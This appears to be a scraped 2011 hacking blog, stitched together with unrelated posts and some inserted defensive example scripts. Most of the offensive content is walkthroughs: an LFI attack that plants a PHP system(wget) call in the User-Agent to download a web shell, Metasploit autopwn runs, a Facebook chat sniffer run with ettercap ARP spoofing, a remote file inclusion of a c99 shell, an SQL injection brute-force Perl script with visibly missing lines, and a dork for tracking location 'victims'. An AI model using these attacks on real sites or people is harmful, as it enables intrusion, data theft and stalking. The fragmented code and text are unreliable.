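        self._sessions[sid] = {"fp": self.fingerprint(user_agent), "user": None, "visits": 0}
        return sid

    def regenerate(self, sid: str) -> str:
        """session_regenerate_id(): move the data to a new id and kill the old one."""
        data = self._sessions.pop(sid)
        new_sid = secrets.token_hex(16)
        self._sessions[new_sid] = data
        return new_sid

    def login(self, sid: str, username: str) -> str:
        # Any privilege change gets a new identifier.
        self._sessions[sid]["user"] = username
        return self.regenerate(sid)

    def check(self, sid: str, user_agent: str) -> str:
        """'ok' if the id is live and the fingerprint matches, 'reauth' if the
        id is live but the browser fingerprint changed (prompt for password),
        'none' if the id is unknown."""
        data = self._sessions.get(sid)
        if data is None:
            return "none"
        if not hmac.compare_digest(data["fp"], self.fingerprint(user_agent)):
            return "reauth"
        data["visits"] += 1
        return "ok"

    def user(self, sid: str) -> Optional[str]:
        return self._sessions.get(sid, {}).get("user")


def demo() -> dict:
    """Replay the two attacks from the ezine against the store (constructed scenario)."""
    store = SessionStore()
    victim_ua = "Mozilla/5.0 Gecko"
    attacker_ua = "Mozilla Compatible (MSIE)"

    # +01: attacker plants PHPSESSID=123456789; the victim opens that link and logs in.
    planted = "123456789"
    pre_login = store.start(planted, victim_ua)
    post_login = store.login(pre_login, "alice")

    # +02: attacker replays the victim's real cookie from a different browser.
    return {
        "fixation_rejected": pre_login != planted and store.check(planted, victim_ua) == "none",
        "old_id_dead": store.check(pre_login, victim_ua) == "none",
        "hijack": store.check(post_login, attacker_ua),
        "legit": store.check(post_login, victim_ua),
        "user": store.user(post_login),
    }


if __name__ == "__main__":
    print(demo())
```

The User-Agent check is deliberately a speed bump rather than a wall: an attacker who sniffed the cookie on open Wi-Fi usually sniffed the headers too, which is why the ezine suggests carrying the fingerprint as a second secret in the URL as well. The part that actually closes the hole is refusing client-chosen identifiers and regenerating on login.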

====== +03 - Firesheep ======

Recently a Firefox extension called Firesheep has made it easy for session hijackers to attack users on public Wi-Fi. For websites like Facebook and Twitter, and any others the user adds to its preferences, Firesheep lets its user capture session cookies and access private information, threatening the personal property of public Wi-Fi users.

Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.

Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win.



[Version 0.3] Facebook chat sniffer

I threw this together in class yesterday because Facebook was kicking me out when I tried to session hijack.

Version 0.3 http://pastebin.com/qNGuK9ix

Save it as fbsniff.py, set permissions, and copy it to sbin:

chmod 755 fbsniff.py
cp fbsniff.py /usr/sbin/fbsniff

Start the sniffer (the capture file name must match what you pass to fbsniff below):
tshark -i <interface> -w out.pcap

Start fbsniff:
fbsniff -c out.pcap -l

You can also run it with a basic message filter:
fbsniff -c out.pcap -f "Keegan,Test"

Start ettercap:
ettercap -T -M arp -i <interface> // // -P autoadd

Friday, July 8, 2011

BT5 + Metasploit + postgresql (works for me)

i'm working in this mode :

root@bt:~# apt-get install postgresql
root@bt:~# sudo apt-get install libpgsql-ruby
root@bt:~# sudo su postgres
sh-4.1$ createuser root -P
could not change directory to "/root"
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
sh-4.1$ createdb --owner=root metasploit
could not change directory to "/root"
sh-4.1$ exit
root@bt:~# msfconsole
msf > db_driver postgresql
[*] Using database driver postgresql
msf > db_connect root:toor@
msf > db_workspace -a MyProject
[*] Added workspace: MyProject
msf > db_nmap -sS -O
[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-05-14 15:27 CEST
[*] Nmap: Nmap scan report for hackdany-cecb3e.homenet.telecomitalia.it (
[*] Nmap: Host is up (0.00055s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: MAC Address: 08:00:27:F1:F2:8F (Cadmus Computer Systems)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3
[*] Nmap: Network Distance: 1 hop
[*] Nmap: OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 3.56 seconds
msf > db_autopwn -p -e -q
[*] (1/51 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against
[*] (2/51 [0 sessions]): Launching exploit/freebsd/samba/trans2open against
[*] (3/51 [0 sessions]): Launching exploit/linux/samba/chain_reply against
[*] (4/51 [0 sessions]) ... etc. etc. etc.
It works perfectly (FOR ME).

Thursday, July 7, 2011

Modding Golden Eye:rogue agent (concept of making halo)

Required Tools
TilEd 2002
Kiwi Ds Editor
A Hex Editor


Extract your clean (unedited) ROM with dslazy.

Now you will have folders and files like this:


Editing The Game's Icons

Go to the data folder. Inside the data folder there are many other folders;
to get to the icons, go to the icons folder (surprised?).
Try to preview one... (it won't work)
They aren't in the usual Windows format,

so to edit them use TilEd 2002.

Using TilEd 2002
Open up TilEd 2002.
Now click the Browser button (where the File button normally is).
Then click Open.
Navigate to your icons.
They won't show up;
click where it says "all compatible ROMs" and then click "all files".
Then open an icon (e.g. DrNo.ico).
A jumble of random colours appears;
to fix this click SNES 4bpp (see picture).


Now you should get a picture like this image shows.
To fix the colours press the button indicated in the previous picture.
(Note: this isn't the right palette; could someone please make one?)

Copy the tiles to the editor window, then select paint mode
and edit in the editor window.

(These aren't the virtual training icons; they are the ones that pop up when you have to face "Xenia Onatopp" and other characters in the campaign.)

Text Editing
Objectives and such...
Editing Level Objectives Text
I will use Fort Knox as an example.
Go to:
Open 1_0_Crash.txt with Notepad.
Now type in the new message (in the same space as the old one).
(Try to keep a similar length, otherwise it falls off the screen.)
(For more space, delete the empty lines between text (but not above the text!).)
This also works on all the other txt files in the level folders.

Editing In-Game Text
Remember this text from level 1?

OR even

It's in Templates.crt.
Open templates.crt in your hex editor, then press Ctrl+F and search for the string you want (e.g. "NUCLEAR DEVICE" or "YOUR PERSONAL"; for guns just search for their names, e.g. "JACKAL").
Edit to your heart's content (without adding extra bytes!), and that's a little more of this game hacked...

(You can edit some of this directly in the ROM, but it shows a message on boot-up along the lines of "Menus Edited Please Recompile".)

Editing The Game's Music/Sound
I'm not too sure about this, but here's some info I got off the net.

Extracting SDAT files
In dslazy/NDS_EXTRACT/data/Sounds there are some files (Sound_All.sdat etc.).
Open Kiwi Ds's Editor,
then click File/Open,
navigate to dslazy/NDS_EXTRACT/data/Sounds
and open the file you want to extract.
It will then show up in the editor;
double click it.
This should bring up a new window; now select all,
then click Extract Selected.

Repacking SDAT files
Open Kiwi Ds's Editor,
then click Tools/Make SDAT,
click source files folder (the ... button),
then navigate to the extracted files directory.

Converting SSEQ to MIDI

Copy SEQ_MUSIC0.sseq (example) to sseq2mid-20070314\bin,
create a new .bat batch file and insert this code:
sseq2mid.exe -1 SEQ_MUSIC0.sseq

This will give you a MID file.

Converting MIDI to SSEQ
kiwids released a program called mid2sseq (link);
will use soon.

Model Swapping Data
Incorrect model swapping will cause the game to freeze.

Your guns are labeled like 'ar4_commando.nsbmd';
your enemies' guns are labeled like 'npc_assault_rifle.nsbmd'.

I will work on a model swapping compatibility list...
(probably on my own site so I can work in HTML)
Swapping Jackal and spec9 works (animations work too: shoot and reload).
Replacing the minigun with the 50 caliber machine gun freezes the game;
this could be due to animation file incompatibilities...

got me a PSP 1001 black (x2)

Yes, 2 PSPs without battery, but I do have a charger for them. I don't have a Memory Stick Duo; I'm going to buy one from my friend on July 16. Then when I get into PSP game making I'm going to make Halo 2 PSP. It uses Halo 2 sounds and models from Custom Edition; this should make it the H2 version.

Wednesday, July 6, 2011

Metasploit Autopwn fix for Backtrack 5

A lot of people are having trouble with Metasploit's Autopwn feature in Backtrack 5. It does require a little bit of tweaking to get going, below are a few steps to get you on your way.
I prefer to use postgreSQL over MySQL. This tutorial will only show how to properly configure Autopwn using postgreSQL.
First you must determine if you have postgres installed on your system. To do this type the following into a terminal:
ls /etc/init.d/ | grep post

If you do not see "postgresql-8.4" you need to update or install postgresql. This can be done using the repositories:
apt-get install postgresql-8.4 postgresql-client-8.4
Now start the postgreSQL server by typing:
/etc/init.d/postgresql-8.4 start
NOTE: If you receive an error like
"The PostgreSQL server failed to start. Please check the log output:"
you will need to disable SSL in the config file. To do this:
nano /etc/postgresql/8.4/main/postgresql.conf
Look for the section like the one below:
# - Security and Authentication -
#authentication_timeout = 1min # 1s-600s
#ssl = true # (change requires restart)
You simply comment it out like I did above with the "#" sign.
Now restart postgres:
/etc/init.d/postgresql-8.4 start
Now connect to the server and change the password to whatever you want:
sudo su postgres -c psql

ALTER USER postgres WITH PASSWORD 'yoursecretpasswd';

(make sure to use the quotation marks when setting your password; here is a real life example)

ALTER USER postgres WITH PASSWORD 'swordfish';
\q
sudo passwd -d postgres

sudo su postgres -c passwd
(Here you want to use the same password you used a few steps back)

Postgresql is all setup, now to Metasploit.
Start Metasploit by typing: msfconsole
Once Metasploit starts, type: db_driver
If the driver is already loaded it will give an output like below.

If not, you will need to manually load the driver by typing: db_driver postgresql
Now all you have to do is connect to your database by typing (the name at the end of the command is the database name):
db_connect postgres:mysecretpassword@ autopwn

We are now connected and ready to run autopwn.
Run a nmap scan on the target:
db_nmap
To see all of autopwn's options type: db_autopwn
Finally launch the autopwn and let sit back and wait:
db_autopwn -p -t -e -r

After autopwn completes type:
sessions -l
Any successful attacks will result in a session. To interact with that session type:
sessions -i 1 (where 1 is the session number)
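The SSL edit from the NOTE above, as a script. This is an added example, not part of the original post: it comments out an active "ssl" line in postgresql.conf exactly as the post does by hand, leaves already-commented lines alone, and keeps a backup. The conf path is the one the post edits; pass another file as the first argument.

```shell
#!/bin/sh
# Added example (not from the original post): comment out an active "ssl" line in
# postgresql.conf the way the post does by hand, without touching anything else.
# PG_CONF_DEFAULT is the path the post edits; pass a different file as $1.

PG_CONF_DEFAULT=/etc/postgresql/8.4/main/postgresql.conf

# Exit 0 if the file has an active (uncommented) "ssl = true" or "ssl = on" line.
pg_ssl_enabled() {
    grep -Eq '^[[:space:]]*ssl[[:space:]]*=[[:space:]]*(true|on)([[:space:]]|#|$)' "$1"
}

# Prefix every active "ssl = true/on" line with "#", keeping the rest of the line
# (including the "(change requires restart)" comment) intact. Already-commented
# lines are left alone, so running this twice does not produce "##ssl".
disable_pg_ssl() {
    pgc="$1"
    pgt="$pgc.tmp.$$"
    sed -E 's/^([[:space:]]*)(ssl[[:space:]]*=[[:space:]]*(true|on))/\1#\2/' "$pgc" > "$pgt" \
        && mv "$pgt" "$pgc"
}

# Number of commented-out "ssl =" lines (prints 0 and exits 1 when there are none).
pg_ssl_commented_count() {
    grep -Ec '^[[:space:]]*#[[:space:]]*ssl[[:space:]]*=' "$1"
}

main() {
    pgc="${1:-$PG_CONF_DEFAULT}"
    if [ ! -r "$pgc" ]; then
        echo "cannot read $pgc" >&2
        return 1
    fi
    if pg_ssl_enabled "$pgc"; then
        cp "$pgc" "$pgc.bak" || return 1   # keep a backup before editing
        disable_pg_ssl "$pgc" || return 1
        echo "ssl commented out in $pgc (backup: $pgc.bak); now restart postgresql"
    else
        echo "no active ssl setting in $pgc; nothing to do"
    fi
}

# Run when executed directly; a missing conf file is reported, not fatal, so that
# sourcing this file for its functions on another machine still works.
main "$@" || :
```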

Monday, July 4, 2011

[LFI]Local File Inclusion and shell upload[Tutorial]

LFI (Local File Inclusion)

1 – Introduction

In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and
injecting malicious code into proc/self/environ. It is a step by step tutorial.

2 – Finding LFI

- Now we are going to find a website vulnerable to Local File Inclusion. So we found our target; let's check it.


- Now let's replace contact.php with ../ so the URL will become


and we got an error

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

there is a big chance of a Local File Inclusion vulnerability. Let's go to the next step.

- Now let's check for etc/passwd to see if it is Local File Inclusion vulnerable. Let's make a request:


we got an error and no etc/passwd file

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

so we go more directories up


we successfully included the etc/passwd file.

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

3 – Checking if proc/self/environ is accessible

- Now let's see if proc/self/environ is accessible. We replace etc/passwd with proc/self/environ


If you get something like

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/ Server at www.website.com Port 80

proc/self/environ is accessible. If you got a blank page or an error, proc/self/environ is not accessible or the OS is FreeBSD.

4 – Injecting malicious code

- Now let's inject our malicious code into proc/self/environ. How can we do that? We can inject our code in the User-Agent HTTP header.
Use the Tamper Data add-on for Firefox to change the User-Agent. Start Tamper Data in Firefox and request the URL:


Choose Tamper and in the User-Agent field write the following code:

<?system(wget http://fbi.20x.cc/gov/data/R00TSH3ll.txt -O sh3ll.php);?>
{The Unknown: the link of the shell used has expired, use the Link I posted at the end of this Thread}

Then submit the request.

Our command will be executed (it will download the txt shell from http://hack-bay.com/Shells/gny.txt {The Unknown: the link of the shell used has expired, use the Link I posted at the end of this Thread} and save it as shell.php in the
website directory) through system(), and our shell will be created. If it doesn't work, try exec(), because system() can be disabled on the webserver from php.ini.

5 – Access our shell

- Now let's check if our malicious code was successfully injected. Let's check if the shell is present.


Our shell is successfully uploaded.

All In One Collection Tutorials & Tools Uploaded By sheikh_shahzeb More Than 10 GB

By - sheikh_shahzeb
Infinity Exists Underground and vblog Compete Tutorials

Free File Hosting Made Simple - MediaFire

BT 4 Tutorials


Milworm Tutorials


BT Offensive Security Tutorials


Other Collection of Hacking Videos


My Ways Of Hacking Go Here


Must Use Tools in Hacking


Download BackTrack R2


Cracking Collection


join files with winrar and hjsplit

to watch videos use klite media player and codecs

Try suspicious files in a sandbox or in a virtual machine like VMware for your own security; I am sharing VMware here also.


Here Is First DVD OF CEH Labs Volume 1

CEH Labs Volume 1

If it asks for any password, type creativemediafire.tk

It took more than a month to upload, but I think it is useful for all; that's why I am sharing it.

100% virus clean; learn ethical ways of hacking

Tuesday, June 21, 2011

Website that has a lot of Lucid software.

Lucid is part of Ubuntu and Ubuntu is part of Debian.
So you figure out how it works.
Anyway, this is all I have got so far with my Lucid.
(""" all the software will work with HP Mini 210 """)
You can get aircrack-ng, wireshark, etc. here. Good luck.

Using Puppy Linux and HP Mini 210.

This combination of software and hardware is almost perfect for hacking, but it requires some sacrifices: it lacks sound, typing, mouse gestures and support for extra hardware (e.g. wireless key button, sound key button).
It supports many utilities; basically, if any software is supported in Lucid (Ubuntu > Debian), then it will work.

Backtrack 4 will not support Broadcom 43x drivers at all, but Puppy Linux will support everything that is possible with BC43x chipsets. Backtrack 4 supports sound and just scroll gestures on the touchpad, but it does not support portability.

Monday, June 20, 2011

Running aircrack-ng suite natively on HP-Mini 210-1000

This guide shows how to make the aircrack-ng suite work with the HP Mini 210-1000's Broadcom 4312.

FlashDrive (more than 2 GB)
Windows (Already comes with HP mini)
1.) Get YUMI (Win32)
2.) On YUMI, look for Puppy Linux and download.
3.) Create the Live on the USB with YUMI
4.) Make sure your HPMINI BIOS boots USB as the first device.
5.) Boot up Puppy Linux
6.) Select wlan0 (because it supports broadcom :D)
7.) Get any web browser
8.) Download file from http://www.murga-linux.com/puppy/viewtopic.php?t=60202
9.) Read more about aircrack-ng suite
So, that's how you get aircrack-ng to work with the HP Mini 210-1000;
it proves that the HP Mini is a hacking tool.

Friday, June 17, 2011

How to Hack any Website.

This tutorial was made by Hini Aes, dedicated to Soumyodeep on Facebook.

No computer network is 100% secure, period, but some networks are secure enough from a hacker. Firstly, my topic is about hacking websites, so first you want to know what an exploit is in my terms so you will understand.
Exploit: the weak section of a website. With an exploit you can hack any computer system; sometimes an exploit might seem to be limited, but it can be your advantage for something else, maybe an HTML trojan or virus.

Deface: to replace code or a file of the original index page.
SQL Injection/SQLi: en.wikipedia.org/wiki/SQL_injection
XSS: en.wikipedia.org/wiki/Cross-site_scripting
LFI/RFI: http://www.scribd.com/doc/6498408/Remote-and-Local-File-Inclusion-Explained

SQL Injection Example:


If you get an error in the browser like "error in your MySQL syntax"
after putting ' after a .php?value=#,
then the site is vulnerable to SQL injection.

XSS (Cross Site Scripting):
www.xsssite.com/search.php?query=<h1>this site is vulnerable to xss </h1>

Remote & Local File Inclusion.
RFI Exploit.
By using the parameter include=http://www.haxorz.com/c99.txt
the page will include c99.txt from haxorz.com; but if you use a .php shell then it will run on haxorz.com, whereas in .txt form it will load its contents from northkoreans.com.
You have to search about that, sorry.

Register on www.hackforums.net, read the tutorials and do them; then you will become a website hacker.
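The request patterns in the LFI tutorial above (../ traversal to etc/passwd and proc/self/environ, a PHP tag planted in the User-Agent) and the SQL injection and XSS checks in this post (a stray quote on an id parameter, UNION SELECT against information_schema, an HTML tag reflected through a search box) are exactly what a defender wants to spot in web-server logs. Here is an added example that does that; it is not code from either post, and every log line, IP and host in it is constructed. The decoding loop also catches the double-encoded form (..%252F) that a single percent-decode would miss.

```python
"""Scan Apache combined-format access-log lines for the probe patterns the
posts describe: "../" traversal to /etc/passwd or /proc/self/environ, PHP tags
planted in the User-Agent, a stray quote on a numeric id (error-based SQLi
probe), UNION SELECT / information_schema pulls and reflected HTML (XSS).
Added example, not code from the blog; every sample value is constructed."""
import re
from urllib.parse import unquote_plus

# Constructed log lines with fake IPs, hosts and paths. Lines 1 and 8 are benign
# ("union+station" is an ordinary search term, not an injection).
SAMPLE_LOG = """\
10.0.0.5 - - [24/Jul/2011:10:00:01 +0000] "GET /index.php?view=contact.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [24/Jul/2011:10:00:02 +0000] "GET /index.php?view=../../../../../../etc/passwd HTTP/1.1" 200 1833 "-" "Mozilla/5.0"
10.0.0.5 - - [24/Jul/2011:10:00:03 +0000] "GET /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.5 - - [24/Jul/2011:10:00:04 +0000] "GET /index.php?view=..%252F..%252Fproc%252Fself%252Fenviron HTTP/1.1" 200 2048 "-" "<?php echo 1; ?>"
10.0.0.9 - - [24/Jul/2011:10:00:05 +0000] "GET /detay.php?id=-288%20and%201=1%20union%20select%201,2,group_concat(column_name),4%20from%20information_schema.columns HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.0.0.9 - - [24/Jul/2011:10:00:06 +0000] "GET /detay.php?id=22' HTTP/1.1" 500 300 "-" "Mozilla/5.0"
10.0.0.9 - - [24/Jul/2011:10:00:07 +0000] "GET /search.php?query=%3Ch1%3Ethis%20site%20is%20vulnerable%3C/h1%3E HTTP/1.1" 200 700 "-" "Mozilla/5.0"
10.0.0.2 - - [24/Jul/2011:10:00:08 +0000] "GET /search.php?query=union+station HTTP/1.1" 200 700 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each rule is matched against the *decoded* URL; the names are the labels reported.
URL_RULES = [
    ("lfi-traversal", re.compile(r"\.\./|\.\.\\")),
    ("lfi-sensitive-file", re.compile(r"/(?:etc/passwd|proc/self/environ)\b")),
    ("sqli-union-select", re.compile(r"\bunion\b[\s/*]+(?:all\s+)?select\b", re.I)),
    ("sqli-information-schema", re.compile(r"\binformation_schema\b", re.I)),
    ("sqli-quote-on-numeric-id", re.compile(r"[?&][A-Za-z_]*id=\d*'", re.I)),
    ("xss-html-tag", re.compile(r"<\s*/?\s*(?:script|h1|img|iframe|svg)\b", re.I)),
]
# The User-Agent gets its own rule: "<?" never belongs in a browser string.
UA_RULES = [("php-tag-in-user-agent", re.compile(r"<\?"))]


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so ..%252F (double-encoded) is seen as ../ too."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line: str):
    """Split one combined-format line into fields, or return None if it does not parse."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def classify(url: str, user_agent: str) -> list:
    """Return the names of every rule the decoded URL or User-Agent trips, in rule order."""
    decoded_url = fully_decode(url)
    hits = [name for name, rx in URL_RULES if rx.search(decoded_url)]
    hits += [name for name, rx in UA_RULES if rx.search(fully_decode(user_agent))]
    return hits


def scan_log(text: str) -> list:
    """One record per suspicious line: line number, client IP, decoded URL and rule names.
    Lines that do not parse are reported too, so a mangled log format is visible."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = parse_line(line)
        if fields is None:
            findings.append({"line": number, "ip": None, "url": line, "rules": ["unparsable-line"]})
            continue
        rules = classify(fields["url"], fields["ua"])
        if rules:
            findings.append({"line": number, "ip": fields["ip"],
                             "url": fully_decode(fields["url"]), "rules": rules})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']:>2}  {str(f['ip']):<10}  {', '.join(f['rules'])}")
        print(f"         {f['url']}")
```

Rule names are deliberately coarse: a hit is a lead for the responder to look at the surrounding requests from that client, not proof of compromise.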

Tuesday, June 14, 2011

Automatic SQL Injection with Brute Force [Perl Script]

The good thing about this script is that it is multiplatform and an auto injection tool, so it makes the process faster, but it will not always work compared to a manual SQL injection.



#                           -[+]- SQL-PwnZ v1.1 | By Login-Root -[+]-                   ###
# [+] inf0:                                                                             ###
# It Searchs:                                                                           ###
# ===========                                                                           ###
#  - Nº of columns                                                                      ###        
#  - Information_Schema && MySQL.User                                                   ###
#  - LOAD_FILE                                                                          ###
#  - Tables                                                                             ###                                                
#  - Columns                                                                            ###
#                                                                                       ###
#  ...and save it on a nice text file.                                                  ###
#                                                                                       ###
# [+] Use:                                                                              ###
# perl sqlpwnz.pl [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]             ###
#   [WEBSITE]: http://www.web.com/index.php?id=                                         ###
#   [COLUMNS]: Limit of columns to check                                                ###
#   [FILE]: File where save the results                                                 ###
#   [COMMENT]: '/*' or '--' (Without '') (Optional)                                     ###
#   [-T]: Try to brute force tables (Optional)                                          ###
#   [-C]: Try to brute force columns (Optional)                                         ###
#   [-NOCHECK]: Skip the initial check (Optional)                                       ###
# [+] c0ntact:                                                                          ###
# MSN:    no.more@passport.com                                                          ###
# Jabber: login-root@x23.eu                                                             ### 
# E-Mail: login_root@yahoo.com.ar                                                       ###
#                                                                                       ###
# [+] sh0utz:                                                                           ###
# In memory of ka0x | Greetz: KSHA ; Psiconet ; Knet ; VenoM ; InyeXion                 ###
# Many thanks to boER, who teach me a little of perl ;D                                 ###
# ARGENTINA PRODUCT :)                                                                  ###
use LWP::Simple;
                 print "\n\n-[+]- SQL-PwnZ v1.1 | By Login-Root -[+]-\n=========================================";
                 print "\n\nUse: perl $0 [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]\n";
                 print "\n[WEBSITE]: http://www.web.com/index.php?id=\n[COLUMNS]: Limit of columns to check\n[FILE]: File where save the results\n[COMMENT]: '/*' o '--' (Without '') (Optional)\n[-T]: Try to brute force tables (Optional)\n[-C]: Try to brute force columns (Optional)\n[-NOCHECK]: Skip the initial check (Optional)\n\n";
                 exit (0);
if ( $ARGV[0]   !~   /^http:/ ) 
      $ARGV[0] = "http://" . $ARGV[0];
if ($ARGV[3] =~ "--" || $ARGV[4] =~ "--" || $ARGV[5] =~ "--" || $ARGV[6] =~ "--")
        $cmn.= "+";
        print "\n[+] Comments to use: '--' & '+'";      
        $cmn.= "/**/";
        $cfin.= "/*";
        print "\n[+] Comments to use: '/*' & '/**/'";
open(WEB,">>".$ARGV[2]) || die "\n\n[-] Failed creating the file\n";
if ($ARGV[3] =~ "-NOCHECK" || $ARGV[4] =~ "-NOCHECK" || $ARGV[5] =~ "-NOCHECK" || $ARGV[6] =~ "-NOCHECK")
      print "\n[!] Skipping the initial check...\n";
      print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
      print "\n[!] Checking if the website is vulnerable...\n";
      $response=get($sql)or die("[-] Wrong Website, check it\n");
      if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ ||         $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/)
            print "[+] Vulnerable website, script continues...\n";
            print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
            print "[-] Website apparently not vulnerable to SQL Inyection, try another comment\n\n";
print "\n[!] Looking up columns...\n";
for ($column = 0 ; $column < $ARGV[1] ; $column ++)
    if ($column == 0)
          print WEB "\n[COLUMNS]:\n\n";
          $inyection = '';
         $union = '';
   $response=get($sql)or die("[-] Failed to try to find the number of columns, check website\n");
   if($response =~ /loginpwnz/)
        $column ++;
        print "[+] The site has $column columns\n\n";
        print "$sql\n";
        print WEB "$sql\n";
        print "\n[!] Checking if Information_Schema exists...";
        $response=get($sql)or die("[-] Impossible to get Information_Schema\n");
        if($response =~ /loginpwnz/)
                        print "\n[+] Information_Schema available...saving in $ARGV[2]";
           print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";
                print "\n[-] Information_Schema unavailable";
        print "\n[!] Checking if MySQL.User exists...";
        $response=get($sql)or die("[-] Impossible to get MySQL.User\n");
        if($response =~ /loginpwnz/)
                        print "\n[+] MySQL.User available...saving in $ARGV[2]";
                print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";
                print "\n[-] MySQL.User unavailable";
        while ($loadcont < $column-1)
        print "\n[!] Checking if it is possible to inject LOAD_FILE...";
        $response=get($sql)or die("[-] Imposible inyectar LOAD_FILE\n");
        if($response =~ /root:x:/)
                        print "\n[+] LOAD_FILE available...saving in $ARGV[2]";
                        print WEB "\n\n[LOAD_FILE]:\n\nload_file(0x2f6574632f706173737764) => OK! (0x2f6574632f706173737764 => /etc/passwd)\n";
                print "\n[-] LOAD_FILE unavailable";
        if ($ARGV[3] =~ "-T" || $ARGV[4] =~ "-T" || $ARGV[5] =~ "-T" || $ARGV[6] =~ "-T")
             print "\n\n[!] Brute forcing tables...";
             print WEB "\n\n[TABLES]:\n\n";
             foreach $tabla(@nombretabla)
                 $response=get($sql)or die("[-] Impossible to get tables\n");
                 if($response =~ /loginpwnz/)
                       print "\n[+] Table $tabla exists...saving in $ARGV[2]";
                       print WEB "$sql\n";
       if ($ARGV[3] =~ "-C" || $ARGV[4] =~ "-C" || $ARGV[5] =~ "-C" || $ARGV[6] =~ "-C")
                print "\n\n[!] Table to brute force columns: ";
           print WEB "\n\n[COLUMNS IN TABLE $tabla]:\n\n";
           foreach $columna(@nombrecolumna)
            $response=get($sql)or die("[-] Impossible to get columns\n");
            if ($response =~ /loginpwnz/)
                     print "\n[+] Column $columna available...saving in $ARGV[2]";
                     print WEB "$columna\n";
       print WEB "\n\n\n[*EOF*]";
       print "\n\n[+] Everything saved correctly in $ARGV[2]\n\n";
       print "## c0ded by Login-Root | 2008 ##\n\n";
       exit (0);
print "[-] Impossible to find number of columns, try more columns\n\n";
print "## c0ded by Login-Root | 2008 ##\n\n";
exit (0);

Monday, June 13, 2011

important information [dork]

Site: google.com/latitude - This is a free application where you can track
your PC, laptop and mobile; just log in there and you will be tracked
freely (used to track yourself live, and you can put this in blogs to show
where you are).

I simply made a dork that shows a couple of people; after some years, when
this application grows stronger, you can get tons of victims.



Sensitive file [dork] ionCube

